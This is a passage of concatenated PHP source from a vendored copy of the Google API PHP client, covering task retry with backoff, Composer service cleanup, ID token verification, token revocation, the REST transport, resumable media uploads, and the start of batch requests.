must be greater than 0.'); } $this->factor = $config['factor']; } if (isset($config['jitter'])) { if ($config['jitter'] <= 0) { throw new \Google\Site_Kit_Dependencies\Google\Task\Exception('Task configuration `jitter` must be greater than 0.'); } $this->jitter = $config['jitter']; } if (isset($config['retries'])) { if ($config['retries'] < 0) { throw new \Google\Site_Kit_Dependencies\Google\Task\Exception('Task configuration `retries` must not be negative.'); } $this->maxAttempts += $config['retries']; } if (!\is_callable($action)) { throw new \Google\Site_Kit_Dependencies\Google\Task\Exception('Task argument `$action` must be a valid callable.'); } $this->action = $action; $this->arguments = $arguments; } /** * Checks if a retry can be attempted. * * @return boolean */ public function canAttempt() { return $this->attempts < $this->maxAttempts; } /** * Runs the task and (if applicable) automatically retries when errors occur. * * @return mixed * @throws \Google\Service\Exception on failure when no retries are available. */ public function run() { while ($this->attempt()) { try { return \call_user_func_array($this->action, $this->arguments); } catch (\Google\Site_Kit_Dependencies\Google\Service\Exception $exception) { $allowedRetries = $this->allowedRetries($exception->getCode(), $exception->getErrors()); if (!$this->canAttempt() || !$allowedRetries) { throw $exception; } if ($allowedRetries > 0) { $this->maxAttempts = \min($this->maxAttempts, $this->attempts + $allowedRetries); } } } } /** * Runs a task once, if possible. This is useful for bypassing the `run()` * loop. * * NOTE: If this is not the first attempt, this function will sleep in * accordance to the backoff configurations before running the task. * * @return boolean */ public function attempt() { if (!$this->canAttempt()) { return \false; } if ($this->attempts > 0) { $this->backOff(); } $this->attempts++; return \true; } /** * Sleeps in accordance to the backoff configurations. */ private function backOff() { $delay = $this->getDelay(); \usleep((int) ($delay * 1000000)); } /** * Gets the delay (in seconds) for the current backoff period. * * @return int */ private function getDelay() { $jitter = $this->getJitter(); $factor = $this->attempts > 1 ? $this->factor + $jitter : 1 + \abs($jitter); return $this->delay = \min($this->maxDelay, $this->delay * $factor); } /** * Gets the current jitter (random number between -$this->jitter and * $this->jitter). * * @return float */ private function getJitter() { return $this->jitter * 2 * \mt_rand() / \mt_getrandmax() - $this->jitter; } /** * Gets the number of times the associated task can be retried. * * NOTE: -1 is returned if the task can be retried indefinitely * * @return integer */ public function allowedRetries($code, $errors = []) { if (isset($this->retryMap[$code])) { return $this->retryMap[$code]; } if (!empty($errors) && isset($errors[0]['reason'], $this->retryMap[$errors[0]['reason']])) { return $this->retryMap[$errors[0]['reason']]; } return 0; } public function setRetryMap($retryMap) { $this->retryMap = $retryMap; } } <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ namespace Google\Site_Kit_Dependencies\Google\Task; use Google\Site_Kit_Dependencies\Google\Exception as GoogleException; class Exception extends \Google\Site_Kit_Dependencies\Google\Exception { } <?php /* * Copyright 2020 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Task; use Google\Site_Kit_Dependencies\Composer\Script\Event; use InvalidArgumentException; use Google\Site_Kit_Dependencies\Symfony\Component\Filesystem\Filesystem; use Google\Site_Kit_Dependencies\Symfony\Component\Finder\Finder; class Composer { /** * @param Event $event Composer event passed in for any script method * @param Filesystem $filesystem Optional. Used for testing. */ public static function cleanup(\Google\Site_Kit_Dependencies\Composer\Script\Event $event, ?\Google\Site_Kit_Dependencies\Symfony\Component\Filesystem\Filesystem $filesystem = null) { $composer = $event->getComposer(); $extra = $composer->getPackage()->getExtra(); $servicesToKeep = isset($extra['google/apiclient-services']) ? $extra['google/apiclient-services'] : []; if ($servicesToKeep) { $vendorDir = $composer->getConfig()->get('vendor-dir'); $serviceDir = \sprintf('%s/google/apiclient-services/src/Google/Service', $vendorDir); if (!\is_dir($serviceDir)) { // path for google/apiclient-services >= 0.200.0 $serviceDir = \sprintf('%s/google/apiclient-services/src', $vendorDir); } self::verifyServicesToKeep($serviceDir, $servicesToKeep); $finder = self::getServicesToRemove($serviceDir, $servicesToKeep); $filesystem = $filesystem ?: new \Google\Site_Kit_Dependencies\Symfony\Component\Filesystem\Filesystem(); if (0 !== ($count = \count($finder))) { $event->getIO()->write(\sprintf('Removing %s google services', $count)); foreach ($finder as $file) { $realpath = $file->getRealPath(); $filesystem->remove($realpath); $filesystem->remove($realpath . '.php'); } } } } /** * @throws InvalidArgumentException when the service doesn't exist */ private static function verifyServicesToKeep($serviceDir, array $servicesToKeep) { $finder = (new \Google\Site_Kit_Dependencies\Symfony\Component\Finder\Finder())->directories()->depth('== 0'); foreach ($servicesToKeep as $service) { if (!\preg_match('/^[a-zA-Z0-9]*$/', $service)) { throw new \InvalidArgumentException(\sprintf('Invalid Google service name "%s"', $service)); } try { $finder->in($serviceDir . '/' . $service); } catch (\InvalidArgumentException $e) { throw new \InvalidArgumentException(\sprintf('Google service "%s" does not exist or was removed previously', $service)); } } } private static function getServicesToRemove($serviceDir, array $servicesToKeep) { // find all files in the current directory return (new \Google\Site_Kit_Dependencies\Symfony\Component\Finder\Finder())->directories()->depth('== 0')->in($serviceDir)->exclude($servicesToKeep); } } <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ namespace Google\Site_Kit_Dependencies\Google\Task; /** * Interface for checking how many times a given task can be retried following * a failure. */ interface Retryable { } <?php /* * Copyright 2010 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ namespace Google\Site_Kit_Dependencies\Google; use Google\Site_Kit_Dependencies\Google\Http\Batch; use TypeError; class Service { public $batchPath; /** * Only used in getBatch */ public $rootUrl; public $rootUrlTemplate; public $version; public $servicePath; public $serviceName; public $availableScopes; public $resource; private $client; public function __construct($clientOrConfig = []) { if ($clientOrConfig instanceof \Google\Site_Kit_Dependencies\Google\Client) { $this->client = $clientOrConfig; } elseif (\is_array($clientOrConfig)) { $this->client = new \Google\Site_Kit_Dependencies\Google\Client($clientOrConfig ?: []); } else { $errorMessage = 'Google\\Site_Kit_Dependencies\\constructor must be array or instance of Google\\Client'; if (\class_exists('TypeError')) { throw new \TypeError($errorMessage); } \trigger_error($errorMessage, \E_USER_ERROR); } } /** * Return the associated Google\Client class. * @return \Google\Client */ public function getClient() { return $this->client; } /** * Create a new HTTP Batch handler for this service * * @return Batch */ public function createBatch() { return new \Google\Site_Kit_Dependencies\Google\Http\Batch($this->client, \false, $this->rootUrlTemplate ?? $this->rootUrl, $this->batchPath); } } <?php /* * Copyright 2008 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ namespace Google\Site_Kit_Dependencies\Google\AccessToken; use DateTime; use DomainException; use Exception; use Google\Site_Kit_Dependencies\ExpiredException; use Google\Site_Kit_Dependencies\Firebase\JWT\ExpiredException as ExpiredExceptionV3; use Google\Site_Kit_Dependencies\Firebase\JWT\JWT; use Google\Site_Kit_Dependencies\Firebase\JWT\Key; use Google\Site_Kit_Dependencies\Firebase\JWT\SignatureInvalidException; use Google\Site_Kit_Dependencies\Google\Auth\Cache\MemoryCacheItemPool; use Google\Site_Kit_Dependencies\Google\Exception as GoogleException; use Google\Site_Kit_Dependencies\GuzzleHttp\Client; use Google\Site_Kit_Dependencies\GuzzleHttp\ClientInterface; use InvalidArgumentException; use LogicException; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\AES; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\PublicKeyLoader; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; use Google\Site_Kit_Dependencies\Psr\Cache\CacheItemPoolInterface; /** * Wrapper around Google Access Tokens which provides convenience functions * */ class Verify { const FEDERATED_SIGNON_CERT_URL = 'https://www.googleapis.com/oauth2/v3/certs'; const OAUTH2_ISSUER = 'accounts.google.com'; const OAUTH2_ISSUER_HTTPS = 'https://accounts.google.com'; /** * @var ClientInterface The http client */ private $http; /** * @var CacheItemPoolInterface cache class */ private $cache; /** * @var \Firebase\JWT\JWT */ public $jwt; /** * Instantiates the class, but does not initiate the login flow, leaving it * to the discretion of the caller. */ public function __construct(?\Google\Site_Kit_Dependencies\GuzzleHttp\ClientInterface $http = null, ?\Google\Site_Kit_Dependencies\Psr\Cache\CacheItemPoolInterface $cache = null, $jwt = null) { if (null === $http) { $http = new \Google\Site_Kit_Dependencies\GuzzleHttp\Client(); } if (null === $cache) { $cache = new \Google\Site_Kit_Dependencies\Google\Auth\Cache\MemoryCacheItemPool(); } $this->http = $http; $this->cache = $cache; $this->jwt = $jwt ?: $this->getJwtService(); } /** * Verifies an id token and returns the authenticated apiLoginTicket. * Throws an exception if the id token is not valid. * The audience parameter can be used to control which id tokens are * accepted. By default, the id token must have been issued to this OAuth2 client. * * @param string $idToken the ID token in JWT format * @param string $audience Optional. The audience to verify against JWt "aud" * @return array|false the token payload, if successful */ public function verifyIdToken($idToken, $audience = null) { if (empty($idToken)) { throw new \LogicException('id_token cannot be null'); } // set phpseclib constants if applicable $this->setPhpsecConstants(); // Check signature $certs = $this->getFederatedSignOnCerts(); foreach ($certs as $cert) { try { $args = [$idToken]; $publicKey = $this->getPublicKey($cert); if (\class_exists(\Google\Site_Kit_Dependencies\Firebase\JWT\Key::class)) { $args[] = new \Google\Site_Kit_Dependencies\Firebase\JWT\Key($publicKey, 'RS256'); } else { $args[] = $publicKey; $args[] = ['RS256']; } $payload = \call_user_func_array([$this->jwt, 'decode'], $args); if (\property_exists($payload, 'aud')) { if ($audience && $payload->aud != $audience) { return \false; } } // support HTTP and HTTPS issuers // @see https://developers.google.com/identity/sign-in/web/backend-auth $issuers = [self::OAUTH2_ISSUER, self::OAUTH2_ISSUER_HTTPS]; if (!isset($payload->iss) || !\in_array($payload->iss, $issuers)) { return \false; } return (array) $payload; } catch (\Google\Site_Kit_Dependencies\ExpiredException $e) { // @phpstan-ignore-line return \false; } catch (\Google\Site_Kit_Dependencies\Firebase\JWT\ExpiredException $e) { return \false; } catch (\Google\Site_Kit_Dependencies\Firebase\JWT\SignatureInvalidException $e) { // continue } catch (\DomainException $e) { // continue } } return \false; } private function getCache() { return $this->cache; } /** * Retrieve and cache a certificates file. * * @param string $url location * @throws \Google\Exception * @return array certificates */ private function retrieveCertsFromLocation($url) { // If we're retrieving a local file, just grab it. if (0 !== \strpos($url, 'http')) { if (!($file = \file_get_contents($url))) { throw new \Google\Site_Kit_Dependencies\Google\Exception("Failed to retrieve verification certificates: '" . $url . "'."); } return \json_decode($file, \true); } // @phpstan-ignore-next-line $response = $this->http->get($url); if ($response->getStatusCode() == 200) { return \json_decode((string) $response->getBody(), \true); } throw new \Google\Site_Kit_Dependencies\Google\Exception(\sprintf('Failed to retrieve verification certificates: "%s".', $response->getBody()->getContents()), $response->getStatusCode()); } // Gets federated sign-on certificates to use for verifying identity tokens. // Returns certs as array structure, where keys are key ids, and values // are PEM encoded certificates. private function getFederatedSignOnCerts() { $certs = null; if ($cache = $this->getCache()) { $cacheItem = $cache->getItem('federated_signon_certs_v3'); $certs = $cacheItem->get(); } if (!$certs) { $certs = $this->retrieveCertsFromLocation(self::FEDERATED_SIGNON_CERT_URL); if ($cache) { $cacheItem->expiresAt(new \DateTime('+1 hour')); $cacheItem->set($certs); $cache->save($cacheItem); } } if (!isset($certs['keys'])) { throw new \InvalidArgumentException('federated sign-on certs expects "keys" to be set'); } return $certs['keys']; } private function getJwtService() { $jwt = new \Google\Site_Kit_Dependencies\Firebase\JWT\JWT(); if ($jwt::$leeway < 1) { // Ensures JWT leeway is at least 1 // @see https://github.com/google/google-api-php-client/issues/827 $jwt::$leeway = 1; } return $jwt; } private function getPublicKey($cert) { $modulus = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger($this->jwt->urlsafeB64Decode($cert['n']), 256); $exponent = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger($this->jwt->urlsafeB64Decode($cert['e']), 256); $component = ['n' => $modulus, 'e' => $exponent]; $loader = \Google\Site_Kit_Dependencies\phpseclib3\Crypt\PublicKeyLoader::load($component); return $loader->toString('PKCS8'); } /** * phpseclib calls "phpinfo" by default, which requires special * whitelisting in the AppEngine VM environment. This function * sets constants to bypass the need for phpseclib to check phpinfo * * @see phpseclib/Math/BigInteger * @see https://github.com/GoogleCloudPlatform/getting-started-php/issues/85 */ private function setPhpsecConstants() { if (\filter_var(\getenv('GAE_VM'), \FILTER_VALIDATE_BOOLEAN)) { if (!\defined('Google\\Site_Kit_Dependencies\\MATH_BIGINTEGER_OPENSSL_ENABLED')) { \define('Google\\Site_Kit_Dependencies\\MATH_BIGINTEGER_OPENSSL_ENABLED', \true); } if (!\defined('Google\\Site_Kit_Dependencies\\CRYPT_RSA_MODE')) { \define('Google\\Site_Kit_Dependencies\\CRYPT_RSA_MODE', \Google\Site_Kit_Dependencies\phpseclib3\Crypt\AES::ENGINE_OPENSSL); } } } } <?php /* * Copyright 2008 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ namespace Google\Site_Kit_Dependencies\Google\AccessToken; use Google\Site_Kit_Dependencies\Google\Auth\HttpHandler\HttpHandlerFactory; use Google\Site_Kit_Dependencies\Google\Client; use Google\Site_Kit_Dependencies\GuzzleHttp\ClientInterface; use Google\Site_Kit_Dependencies\GuzzleHttp\Psr7; use Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Request; /** * Wrapper around Google Access Tokens which provides convenience functions * */ class Revoke { /** * @var ClientInterface The http client */ private $http; /** * Instantiates the class, but does not initiate the login flow, leaving it * to the discretion of the caller. */ public function __construct(?\Google\Site_Kit_Dependencies\GuzzleHttp\ClientInterface $http = null) { $this->http = $http; } /** * Revoke an OAuth2 access token or refresh token. This method will revoke the current access * token, if a token isn't provided. * * @param string|array $token The token (access token or a refresh token) that should be revoked. * @return boolean Returns True if the revocation was successful, otherwise False. */ public function revokeToken($token) { if (\is_array($token)) { if (isset($token['refresh_token'])) { $token = $token['refresh_token']; } else { $token = $token['access_token']; } } $body = \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Utils::streamFor(\http_build_query(['token' => $token])); $request = new \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Request('POST', \Google\Site_Kit_Dependencies\Google\Client::OAUTH2_REVOKE_URI, ['Cache-Control' => 'no-store', 'Content-Type' => 'application/x-www-form-urlencoded'], $body); $httpHandler = \Google\Site_Kit_Dependencies\Google\Auth\HttpHandler\HttpHandlerFactory::build($this->http); $response = $httpHandler($request); return $response->getStatusCode() == 200; } } <?php /* * Copyright 2010 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ namespace Google\Site_Kit_Dependencies\Google\Http; use Google\Site_Kit_Dependencies\Google\Auth\HttpHandler\HttpHandlerFactory; use Google\Site_Kit_Dependencies\Google\Service\Exception as GoogleServiceException; use Google\Site_Kit_Dependencies\Google\Task\Runner; use Google\Site_Kit_Dependencies\GuzzleHttp\ClientInterface; use Google\Site_Kit_Dependencies\GuzzleHttp\Exception\RequestException; use Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Response; use Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface; /** * This class implements the RESTful transport of apiServiceRequest()'s */ class REST { /** * Executes a Psr\Http\Message\RequestInterface and (if applicable) automatically retries * when errors occur. * * @template T * @param ClientInterface $client * @param RequestInterface $request * @param class-string<T>|false|null $expectedClass * @param array $config * @param array $retryMap * @return mixed|T|null * @throws \Google\Service\Exception on server side error (ie: not authenticated, * invalid or malformed post body, invalid url) */ public static function execute(\Google\Site_Kit_Dependencies\GuzzleHttp\ClientInterface $client, \Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request, $expectedClass = null, $config = [], $retryMap = null) { $runner = new \Google\Site_Kit_Dependencies\Google\Task\Runner($config, \sprintf('%s %s', $request->getMethod(), (string) $request->getUri()), [self::class, 'doExecute'], [$client, $request, $expectedClass]); if (null !== $retryMap) { $runner->setRetryMap($retryMap); } return $runner->run(); } /** * Executes a Psr\Http\Message\RequestInterface * * @template T * @param ClientInterface $client * @param RequestInterface $request * @param class-string<T>|false|null $expectedClass * @return mixed|T|null * @throws \Google\Service\Exception on server side error (ie: not authenticated, * invalid or malformed post body, invalid url) */ public static function doExecute(\Google\Site_Kit_Dependencies\GuzzleHttp\ClientInterface $client, \Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request, $expectedClass = null) { try { $httpHandler = \Google\Site_Kit_Dependencies\Google\Auth\HttpHandler\HttpHandlerFactory::build($client); $response = $httpHandler($request); } catch (\Google\Site_Kit_Dependencies\GuzzleHttp\Exception\RequestException $e) { // if Guzzle throws an exception, catch it and handle the response if (!$e->hasResponse()) { throw $e; } $response = $e->getResponse(); // specific checking for Guzzle 5: convert to PSR7 response if (\interface_exists('Google\\Site_Kit_Dependencies\\GuzzleHttp\\Message\\ResponseInterface') && $response instanceof \Google\Site_Kit_Dependencies\GuzzleHttp\Message\ResponseInterface) { $response = new \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Response($response->getStatusCode(), $response->getHeaders() ?: [], $response->getBody(), $response->getProtocolVersion(), $response->getReasonPhrase()); } } return self::decodeHttpResponse($response, $request, $expectedClass); } /** * Decode an HTTP Response. * @static * * @template T * @param RequestInterface $response The http response to be decoded. * @param ResponseInterface $response * @param class-string<T>|false|null $expectedClass * @return mixed|T|null * @throws \Google\Service\Exception */ public static function decodeHttpResponse(\Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface $response, ?\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request = null, $expectedClass = null) { $code = $response->getStatusCode(); // retry strategy if (\intVal($code) >= 400) { // if we errored out, it should be safe to grab the response body $body = (string) $response->getBody(); // Check if we received errors, and add those to the Exception for convenience throw new \Google\Site_Kit_Dependencies\Google\Service\Exception($body, $code, null, self::getResponseErrors($body)); } // Ensure we only pull the entire body into memory if the request is not // of media type $body = self::decodeBody($response, $request); if ($expectedClass = self::determineExpectedClass($expectedClass, $request)) { $json = \json_decode($body, \true); return new $expectedClass($json); } return $response; } private static function decodeBody(\Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface $response, ?\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request = null) { if (self::isAltMedia($request)) { // don't decode the body, it's probably a really long string return ''; } return (string) $response->getBody(); } private static function determineExpectedClass($expectedClass, ?\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request = null) { // "false" is used to explicitly prevent an expected class from being returned if (\false === $expectedClass) { return null; } // if we don't have a request, we just use what's passed in if (null === $request) { return $expectedClass; } // return what we have in the request header if one was not supplied return $expectedClass ?: $request->getHeaderLine('X-Php-Expected-Class'); } private static function getResponseErrors($body) { $json = \json_decode($body, \true); if (isset($json['error']['errors'])) { return $json['error']['errors']; } return null; } private static function isAltMedia(?\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request = null) { if ($request && ($qs = $request->getUri()->getQuery())) { \parse_str($qs, $query); if (isset($query['alt']) && $query['alt'] == 'media') { return \true; } } return \false; } } <?php /** * Copyright 2012 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ namespace Google\Site_Kit_Dependencies\Google\Http; use Google\Site_Kit_Dependencies\Google\Client; use Google\Site_Kit_Dependencies\Google\Exception as GoogleException; use Google\Site_Kit_Dependencies\GuzzleHttp\Psr7; use Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Request; use Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Uri; use Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface; /** * Manage large file uploads, which may be media but can be any type * of sizable data. */ class MediaFileUpload { const UPLOAD_MEDIA_TYPE = 'media'; const UPLOAD_MULTIPART_TYPE = 'multipart'; const UPLOAD_RESUMABLE_TYPE = 'resumable'; /** @var string $mimeType */ private $mimeType; /** @var string $data */ private $data; /** @var bool $resumable */ private $resumable; /** @var int $chunkSize */ private $chunkSize; /** @var int $size */ private $size; /** @var string $resumeUri */ private $resumeUri; /** @var int $progress */ private $progress; /** @var Client */ private $client; /** @var RequestInterface */ private $request; /** @var string */ private $boundary; // @phpstan-ignore-line /** * Result code from last HTTP call * @var int */ private $httpResultCode; /** * @param Client $client * @param RequestInterface $request * @param string $mimeType * @param string $data The bytes you want to upload. * @param bool $resumable * @param int $chunkSize File will be uploaded in chunks of this many bytes. * only used if resumable=True */ public function __construct(\Google\Site_Kit_Dependencies\Google\Client $client, \Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request, $mimeType, $data, $resumable = \false, $chunkSize = 0) { $this->client = $client; $this->request = $request; $this->mimeType = $mimeType; $this->data = $data; $this->resumable = $resumable; $this->chunkSize = $chunkSize; $this->progress = 0; $this->process(); } /** * Set the size of the file that is being uploaded. * @param int $size - int file size in bytes */ public function setFileSize($size) { $this->size = $size; } /** * Return the progress on the upload * @return int progress in bytes uploaded. */ public function getProgress() { return $this->progress; } /** * Send the next part of the file to upload. * @param string|bool $chunk Optional. The next set of bytes to send. If false will * use $data passed at construct time. */ public function nextChunk($chunk = \false) { $resumeUri = $this->getResumeUri(); if (\false == $chunk) { $chunk = \substr($this->data, $this->progress, $this->chunkSize); } $lastBytePos = $this->progress + \strlen($chunk) - 1; $headers = ['content-range' => "bytes {$this->progress}-{$lastBytePos}/{$this->size}", 'content-length' => (string) \strlen($chunk), 'expect' => '']; $request = new \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Request('PUT', $resumeUri, $headers, \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Utils::streamFor($chunk)); return $this->makePutRequest($request); } /** * Return the HTTP result code from the last call made. * @return int code */ public function getHttpResultCode() { return $this->httpResultCode; } /** * Sends a PUT-Request to google drive and parses the response, * setting the appropiate variables from the response() * * @param RequestInterface $request the Request which will be send * * @return false|mixed false when the upload is unfinished or the decoded http response * */ private function makePutRequest(\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request) { $response = $this->client->execute($request); $this->httpResultCode = $response->getStatusCode(); if (308 == $this->httpResultCode) { // Track the amount uploaded. $range = $response->getHeaderLine('range'); if ($range) { $range_array = \explode('-', $range); $this->progress = (int) $range_array[1] + 1; } // Allow for changing upload URLs. $location = $response->getHeaderLine('location'); if ($location) { $this->resumeUri = $location; } // No problems, but upload not complete. return \false; } return \Google\Site_Kit_Dependencies\Google\Http\REST::decodeHttpResponse($response, $this->request); } /** * Resume a previously unfinished upload * @param string $resumeUri the resume-URI of the unfinished, resumable upload. */ public function resume($resumeUri) { $this->resumeUri = $resumeUri; $headers = ['content-range' => "bytes */{$this->size}", 'content-length' => '0']; $httpRequest = new \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Request('PUT', $this->resumeUri, $headers); return $this->makePutRequest($httpRequest); } /** * @return RequestInterface * @visible for testing */ private function process() { $this->transformToUploadUrl(); $request = $this->request; $postBody = ''; $contentType = \false; $meta = \json_decode((string) $request->getBody(), \true); $uploadType = $this->getUploadType($meta); $request = $request->withUri(\Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Uri::withQueryValue($request->getUri(), 'uploadType', $uploadType)); $mimeType = $this->mimeType ?: $request->getHeaderLine('content-type'); if (self::UPLOAD_RESUMABLE_TYPE == $uploadType) { $contentType = $mimeType; $postBody = \is_string($meta) ? $meta : \json_encode($meta); } elseif (self::UPLOAD_MEDIA_TYPE == $uploadType) { $contentType = $mimeType; $postBody = $this->data; } elseif (self::UPLOAD_MULTIPART_TYPE == $uploadType) { // This is a multipart/related upload. $boundary = $this->boundary ?: \mt_rand(); $boundary = \str_replace('"', '', $boundary); $contentType = 'multipart/related; boundary=' . $boundary; $related = "--{$boundary}\r\n"; $related .= "Content-Type: application/json; charset=UTF-8\r\n"; $related .= "\r\n" . \json_encode($meta) . "\r\n"; $related .= "--{$boundary}\r\n"; $related .= "Content-Type: {$mimeType}\r\n"; $related .= "Content-Transfer-Encoding: base64\r\n"; $related .= "\r\n" . \base64_encode($this->data) . "\r\n"; $related .= "--{$boundary}--"; $postBody = $related; } $request = $request->withBody(\Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Utils::streamFor($postBody)); if ($contentType) { $request = $request->withHeader('content-type', $contentType); } return $this->request = $request; } /** * Valid upload types: * - resumable (UPLOAD_RESUMABLE_TYPE) * - media (UPLOAD_MEDIA_TYPE) * - multipart (UPLOAD_MULTIPART_TYPE) * @param string|false $meta * @return string * @visible for testing */ public function getUploadType($meta) { if ($this->resumable) { return self::UPLOAD_RESUMABLE_TYPE; } if (\false == $meta && $this->data) { return self::UPLOAD_MEDIA_TYPE; } return self::UPLOAD_MULTIPART_TYPE; } public function getResumeUri() { if (null === $this->resumeUri) { $this->resumeUri = $this->fetchResumeUri(); } return $this->resumeUri; } private function fetchResumeUri() { $body = $this->request->getBody(); $headers = ['content-type' => 'application/json; charset=UTF-8', 'content-length' => $body->getSize(), 'x-upload-content-type' => $this->mimeType, 'x-upload-content-length' => $this->size, 'expect' => '']; foreach ($headers as $key => $value) { $this->request = $this->request->withHeader($key, $value); } $response = $this->client->execute($this->request, \false); $location = $response->getHeaderLine('location'); $code = $response->getStatusCode(); if (200 == $code && \true == $location) { return $location; } $message = $code; $body = \json_decode((string) $this->request->getBody(), \true); if (isset($body['error']['errors'])) { $message .= ': '; foreach ($body['error']['errors'] as $error) { $message .= "{$error['domain']}, {$error['message']};"; } $message = \rtrim($message, ';'); } $error = "Failed to start the resumable upload (HTTP {$message})"; $this->client->getLogger()->error($error); throw new \Google\Site_Kit_Dependencies\Google\Exception($error); } private function transformToUploadUrl() { $parts = \parse_url((string) $this->request->getUri()); if (!isset($parts['path'])) { $parts['path'] = ''; } $parts['path'] = '/upload' . $parts['path']; $uri = \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Uri::fromParts($parts); $this->request = $this->request->withUri($uri); } public function setChunkSize($chunkSize) { $this->chunkSize = $chunkSize; } public function getRequest() { return $this->request; } } <?php /* * Copyright 2012 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ namespace Google\Site_Kit_Dependencies\Google\Http; use Google\Site_Kit_Dependencies\Google\Client; use Google\Site_Kit_Dependencies\Google\Service\Exception as GoogleServiceException; use Google\Site_Kit_Dependencies\GuzzleHttp\Psr7; use Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Request; use Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Response; use Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface; /** * Class to handle batched requests to the Google API service. * * Note that calls to `Google\Http\Batch::execute()` do not clear the queued * requests. To start a new batch, be sure to create a new instance of this * class. */ class Batch { const BATCH_PATH = 'batch'; private static $CONNECTION_ESTABLISHED_HEADERS = ["HTTP/1.0 200 Connection established\r\n\r\n", "HTTP/1.1 200 Connection established\r\n\r\n"]; /** @var string Multipart Boundary. */ private $boundary; /** @var array service requests to be executed. */ private $requests = []; /** @var Client */ private $client; private $rootUrl; private 